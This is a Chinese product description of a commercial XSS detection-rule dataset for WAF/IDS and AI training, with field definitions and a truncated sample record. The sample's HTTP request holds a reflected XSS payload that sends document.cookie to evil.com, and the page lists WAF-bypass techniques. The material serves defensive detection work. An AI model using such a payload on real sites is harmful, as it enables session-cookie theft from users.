数据集概览
定义:XSS跨站脚本检测规则数据集是由长沙朗慧信息科技有限公司安全实验室构建的高质量Web安全检测数据集。每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织,覆盖反射型、存储型、DOM型、突变型(mXSS)、CSS注入五大子类型,附带WAF bypass技巧标注(编码绕过/大小写混淆/标签拆分/事件变异等),ATT&CK框架T1189(路过式攻击)映射,专为WAF/IDS XSS检测规则训练和XSS检测AI模型训练设计。
| 数据集名称 | XSS跨站脚本检测规则数据集 |
| 数据总量 | 1,000~30,000条 |
| 数据类型 | 五元组:XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案 |
| 数据来源 | 朗慧安全实验室 + 漏洞平台验证数据 |
| 授权方式 | 商业授权 附带完整授权文件 |
| 交付周期 | 2-4周 |
| XSS子类型 | 反射型XSS(Reflected)、存储型XSS(Stored/Persistent)、DOM型XSS(DOM-based)、mXSS(突变XSS)、CSS注入(CSS Injection) |
| bypass标注 | 包含WAF绕过技巧标签(编码绕过/大小写混淆/标签拆分/事件处理程序变异/JavaScript伪协议/HTML实体编码等) |
| ATT&CK映射 | T1189(Drive-by Compromise)、T1059(Command and Scripting Interpreter) |
| 输出格式 | JSONL / CSV / Excel / PCAP |
| 语言 | 中英双语 |
核心数据字段
每条数据包含规则标识、XML检测规则、攻击Payload(含bypass技巧)、HTTP还原文本、PCAP流量及标准答案六大类别,覆盖从规则定义到bypass对抗的完整链路。
| 字段类别 | 字段数 | 典型字段 |
|---|---|---|
| 规则标识 | 4 | rule_id(规则唯一ID)、rule_name(规则名称)、category(XSS子类型)、severity(严重级别:Critical/High/Medium) |
| XML检测规则 | 3 | rule_xml(ModSecurity/CRS格式XML规则)、rule_signature(规则签名/正则模式)、rule_description(规则说明) |
| 攻击Payload | 4 | payload(原始Payload)、payload_type(Payload类型)、bypass_technique(绕过技巧:编码/大小写/拆分/事件变异等)、payload_encoding(编码方式:URL/HTML Entity/Hex/Base64/UTF-7等) |
| HTTP还原文本 | 3 | http_request(HTTP请求全文,含Headers+Body+Cookies)、http_response(HTTP响应全文)、context(注入上下文:HTML body/attribute/JavaScript/CSS/URL) |
| PCAP流量 | 4 | pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名) |
| 标准答案 | 4 | is_attack(是否为攻击:true/false)、attack_type(攻击子类型)、bypass_detected(bypass是否成功绕过检测)、waf_name(被绕过的WAF名称/None) |
数据样例展示
以下为脱敏后的结构化 JSON 样例,展示XSS五元组检测数据的典型格式(含bypass标注)。
{
"entry_id": "XSS-2024-001523",
"rule_id": "XSS-REFLECT-0089",
"rule_name": "Reflected XSS Detection - Script Tag",
"category": "Reflected XSS",
"severity": "Critical",
"rule_xml": "\n detectXSS \n block \n \n ARGS|REQUEST_BODY \n ",
"payload": "",
"payload_type": "Reflected XSS - Cookie Theft",
"bypass_technique": "None (standard script tag injection)",
"payload_encoding": "None (plaintext)",
"http_request": "GET /search?q=%3Cscript%3Efetch('https://evil.com/steal%3Fcookie%3D'%2Bdocument.cookie)%3C/script%3E HTTP/1.1\r\nHost: vulnerable-blog.com\r\nUser-Agent: Mozilla/5.0\r\nReferer: https://vulnerable-blog.com/\r\n\r\n",
"http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 315\r\n\r\n...搜索结果:<script>fetch(...)</script>...",
"context": "HTML body - reflected search term",
"pcap_info": {
"pcap_file": "xss_reflected_script_tag_20240422.pcap",
"pcap_md5": "a1b2c3d4e5f678901234567890abcdef",
"pcap_size": "5678",
"flow_signature": "HTTP GET with ...